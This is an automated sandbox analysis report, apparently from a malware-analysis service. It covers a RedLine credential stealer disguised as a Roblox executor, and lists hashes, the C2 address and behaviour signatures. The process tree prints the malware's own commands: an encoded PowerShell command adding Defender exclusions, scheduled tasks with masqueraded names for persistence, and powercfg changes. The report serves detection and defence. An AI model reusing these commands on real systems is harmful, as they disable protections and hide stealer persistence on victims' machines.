Analysis

  • max time kernel
    195s
  • max time network
    213s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2022 21:02

General

  • Target

    Roblox Executor/Injector.exe

  • Size

    2.6MB

  • MD5

    0c94ffa43eda8dbb9d4213d63f96dec9

  • SHA1

    8b4c7361470e331a3edf9ef94aff20facff342c2

  • SHA256

    6686e809c825c1f19b849e66e542f673c477832f2ab37b033d840e44ac82277a

  • SHA512

    2909a71b1cf2eb8df9d094067829b1b5910a5deb6c97bddfbc84b32be8f16b4a8e49560487cbaeaf29b4c078a6c28302a6518b23d08f1835d832854162d8ca15

  • SSDEEP

    49152:FEbIpbiqzH1bjD0nSRtcqCygeAVfyJ3il30:FMIpbiqzJjeSI5ZrfyJ3X

Malware Config

Extracted

Family

redline

Botnet

@watashiwokorose

C2

77.73.133.19:31892

Attributes
  • auth_value

    45f131fc4fd6dd7d4b2f3e957f83960d

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Roblox Executor\Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Roblox Executor\Injector.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:100204
      • C:\Users\Admin\AppData\Local\Temp\fl.exe
        "C:\Users\Admin\AppData\Local\Temp\fl.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:101968
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C powershell -EncodedCommand "PAAjAEEAWABqAEoAZQAwAG0AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBYAGEAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAZABLAEsAagBBAGUAbwBkAE8AQwBuADAAIwA+ACAAQAAoACAAPAAjAEoAdQBnAGcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAHMAUwBPADgAeQBaAHUAaABIAFEAOABPACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA4AGoAawBGAFgAWgBvAHoARgAwAEMASwA4AEcAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AHoAaQBhAGUATgBvACMAPgA="
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:102076
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAEEAWABqAEoAZQAwAG0AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBYAGEAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAZABLAEsAagBBAGUAbwBkAE8AQwBuADAAIwA+ACAAQAAoACAAPAAjAEoAdQBnAGcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAHMAUwBPADgAeQBaAHUAaABIAFEAOABPACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA4AGoAawBGAFgAWgBvAHoARgAwAEMASwA4AEcAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AHoAaQBhAGUATgBvACMAPgA="
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:102128
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C echo gBГЕW7цjЮфJмajыGЩHШ & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo AR5JlчrMЗтАKЛy8хc9
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:101976
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
              6⤵
              • Creates scheduled task(s)
              PID:3832
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C echo g & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 4дXIы1W
            5⤵
              PID:1120
              • C:\Windows\SysWOW64\schtasks.exe
                SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                6⤵
                • Creates scheduled task(s)
                PID:2988
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C echo ОzГРSНмЦксмQzGJтБ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ШыdDPyЙшЦсiaйHЦ
              5⤵
                PID:4772
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                  6⤵
                  • Creates scheduled task(s)
                  PID:1568
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C echo ЭуiZгYКЩ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo НVтuxUэKГа
                5⤵
                  PID:3780
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                    6⤵
                    • Creates scheduled task(s)
                    PID:408
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C echo ХдПвqШdbсуz3хЙP & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo лхFYЗAбнЩdWхOXт
                  5⤵
                    PID:1844
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                      6⤵
                      • Creates scheduled task(s)
                      PID:1288
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /C echo лТаIо6JюVУpЮъ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo r0ВвdигBИпЭQНm05чL
                    5⤵
                      PID:1480
                      • C:\Windows\SysWOW64\schtasks.exe
                        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                        6⤵
                        • Creates scheduled task(s)
                        PID:2004
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /C echo уНыqgqxLуdglбСП & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ТитUbs1bЮSLэwPЖkЗ
                      5⤵
                        PID:1304
                        • C:\Windows\SysWOW64\schtasks.exe
                          SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                          6⤵
                          • Creates scheduled task(s)
                          PID:4152
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /C echo jsгJ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 7Ф0eyДнxXЖA3ЙТЭЕ
                        5⤵
                          PID:2904
                          • C:\Windows\SysWOW64\schtasks.exe
                            SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                            6⤵
                            • Creates scheduled task(s)
                            PID:1412
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /C echo 5u & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_ЦИРvoО1тКСrnоPLЫkЯ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo дкwВЙ
                          5⤵
                            PID:440
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_ЦИРvoО1тКСrnоPLЫkЯ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                              6⤵
                              • Creates scheduled task(s)
                              PID:2348
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /C echo UфrмЪуo & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_nТH" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo АбSсЛEефoD
                            5⤵
                              PID:2480
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_nТH" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                                6⤵
                                • Creates scheduled task(s)
                                PID:920
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /C echo ьYxEq8ягЯЙtLЧВVm & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_МY" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ГыzLHtvyуWх
                              5⤵
                                PID:1472
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_МY" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:1720
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /C echo rO & SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_йE8о75з" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ъsщrjОшUC6ygpz
                                5⤵
                                  PID:4260
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_йE8о75з" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:616
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo L & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo bSоСIHKSцжuТнvZmYкв
                                  5⤵
                                    PID:3488
                                    • C:\Windows\SysWOW64\powercfg.exe
                                      powercfg /x -hibernate-timeout-ac 0
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3280
                                    • C:\Windows\SysWOW64\powercfg.exe
                                      powercfg /x -hibernate-timeout-dc 0
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1800
                                    • C:\Windows\SysWOW64\powercfg.exe
                                      powercfg /x -standby-timeout-ac 0
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2688
                                    • C:\Windows\SysWOW64\powercfg.exe
                                      powercfg /x -standby-timeout-dc 0
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2672
                                    • C:\Windows\SysWOW64\powercfg.exe
                                      powercfg /hibernate off
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3872
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                                      6⤵
                                      • Creates scheduled task(s)
                                      PID:2984
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd.exe" /C echo ТЬN9dгvgtп7РВэNЭl & SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_Оаtи" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
                                    5⤵
                                      PID:4724
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_Оаtи" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:3964

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                              Filesize

                              2KB

                              MD5

                              c89455577734b863a447e44a57dd60ea

                              SHA1

                              82530ad7e337b4c866beb8e9f1d0e2e0011ed8bc

                              SHA256

                              bfa39bf8f525794b4bd761834f5e475752a899f7d707932ec4561d656dcbdd70

                              SHA512

                              bdc2adacc8c447129bd5ad9d4e3cd965ad7e1fd1d7ed6d1e4d92159761c6e1e83a5b30226002dedbacfcd0ccca48d49a1be895c6b2ce73dadf0d89118be72de2

                            • C:\Users\Admin\AppData\Local\Temp\fl.exe

                              Filesize

                              1.4MB

                              MD5

                              681503845aa49b8b7a3425508cb32dd7

                              SHA1

                              60c74d61e5ae32e8bb7f8180318b76a4f2695069

                              SHA256

                              0efba85b07354c1f9d55fa4b4a91194111ada55f9bf30cee718db1fe1f26939e

                              SHA512

                              d48ce0d4b93eb5fc9aa9c1a8039bdd23d0cadc4841adf966a1e86b280c7c0001c489d99eb5062305399e2a4c37af7b785bf7ac7bacf0c74ef5e5887749ba7ef6

                            • C:\Users\Admin\AppData\Local\Temp\fl.exe

                              Filesize

                              1.4MB

                              MD5

                              681503845aa49b8b7a3425508cb32dd7

                              SHA1

                              60c74d61e5ae32e8bb7f8180318b76a4f2695069

                              SHA256

                              0efba85b07354c1f9d55fa4b4a91194111ada55f9bf30cee718db1fe1f26939e

                              SHA512

                              d48ce0d4b93eb5fc9aa9c1a8039bdd23d0cadc4841adf966a1e86b280c7c0001c489d99eb5062305399e2a4c37af7b785bf7ac7bacf0c74ef5e5887749ba7ef6

                            • memory/408-191-0x0000000000000000-mapping.dmp

                            • memory/440-176-0x0000000000000000-mapping.dmp

                            • memory/616-190-0x0000000000000000-mapping.dmp

                            • memory/920-185-0x0000000000000000-mapping.dmp

                            • memory/1120-167-0x0000000000000000-mapping.dmp

                            • memory/1288-183-0x0000000000000000-mapping.dmp

                            • memory/1304-173-0x0000000000000000-mapping.dmp

                            • memory/1412-187-0x0000000000000000-mapping.dmp

                            • memory/1472-177-0x0000000000000000-mapping.dmp

                            • memory/1480-172-0x0000000000000000-mapping.dmp

                            • memory/1568-189-0x0000000000000000-mapping.dmp

                            • memory/1720-188-0x0000000000000000-mapping.dmp

                            • memory/1800-195-0x0000000000000000-mapping.dmp

                            • memory/1804-149-0x0000000000000000-mapping.dmp

                            • memory/1844-171-0x0000000000000000-mapping.dmp

                            • memory/2004-186-0x0000000000000000-mapping.dmp

                            • memory/2348-193-0x0000000000000000-mapping.dmp

                            • memory/2480-175-0x0000000000000000-mapping.dmp

                            • memory/2672-197-0x0000000000000000-mapping.dmp

                            • memory/2688-196-0x0000000000000000-mapping.dmp

                            • memory/2904-174-0x0000000000000000-mapping.dmp

                            • memory/2984-199-0x0000000000000000-mapping.dmp

                            • memory/2988-182-0x0000000000000000-mapping.dmp

                            • memory/3280-192-0x0000000000000000-mapping.dmp

                            • memory/3488-180-0x0000000000000000-mapping.dmp

                            • memory/3780-169-0x0000000000000000-mapping.dmp

                            • memory/3832-181-0x0000000000000000-mapping.dmp

                            • memory/3872-198-0x0000000000000000-mapping.dmp

                            • memory/3964-194-0x0000000000000000-mapping.dmp

                            • memory/4152-184-0x0000000000000000-mapping.dmp

                            • memory/4260-178-0x0000000000000000-mapping.dmp

                            • memory/4724-179-0x0000000000000000-mapping.dmp

                            • memory/4772-168-0x0000000000000000-mapping.dmp

                            • memory/100204-141-0x0000000004FF0000-0x000000000502C000-memory.dmp

                              Filesize

                              240KB

                            • memory/100204-144-0x0000000005460000-0x00000000054C6000-memory.dmp

                              Filesize

                              408KB

                            • memory/100204-142-0x0000000000DB0000-0x0000000000E42000-memory.dmp

                              Filesize

                              584KB

                            • memory/100204-148-0x0000000006FA0000-0x00000000074CC000-memory.dmp

                              Filesize

                              5.2MB

                            • memory/100204-143-0x00000000062F0000-0x0000000006894000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/100204-133-0x0000000000400000-0x0000000000428000-memory.dmp

                              Filesize

                              160KB

                            • memory/100204-147-0x00000000068A0000-0x0000000006A62000-memory.dmp

                              Filesize

                              1.8MB

                            • memory/100204-140-0x0000000004F90000-0x0000000004FA2000-memory.dmp

                              Filesize

                              72KB

                            • memory/100204-146-0x00000000060C0000-0x0000000006110000-memory.dmp

                              Filesize

                              320KB

                            • memory/100204-139-0x0000000005060000-0x000000000516A000-memory.dmp

                              Filesize

                              1.0MB

                            • memory/100204-132-0x0000000000000000-mapping.dmp

                            • memory/100204-145-0x0000000006040000-0x00000000060B6000-memory.dmp

                              Filesize

                              472KB

                            • memory/100204-138-0x00000000054E0000-0x0000000005AF8000-memory.dmp

                              Filesize

                              6.1MB

                            • memory/101968-153-0x0000000000400000-0x0000000000444000-memory.dmp

                              Filesize

                              272KB

                            • memory/101968-152-0x0000000000000000-mapping.dmp

                            • memory/101968-159-0x0000000007260000-0x000000000726A000-memory.dmp

                              Filesize

                              40KB

                            • memory/101976-166-0x0000000000000000-mapping.dmp

                            • memory/102076-160-0x0000000000000000-mapping.dmp

                            • memory/102128-165-0x00000000061D0000-0x0000000006236000-memory.dmp

                              Filesize

                              408KB

                            • memory/102128-161-0x0000000000000000-mapping.dmp

                            • memory/102128-162-0x0000000005320000-0x0000000005356000-memory.dmp

                              Filesize

                              216KB

                            • memory/102128-163-0x0000000005990000-0x0000000005FB8000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/102128-164-0x0000000006130000-0x0000000006152000-memory.dmp

                              Filesize

                              136KB

                            • memory/102128-170-0x00000000068C0000-0x00000000068DE000-memory.dmp

                              Filesize

                              120KB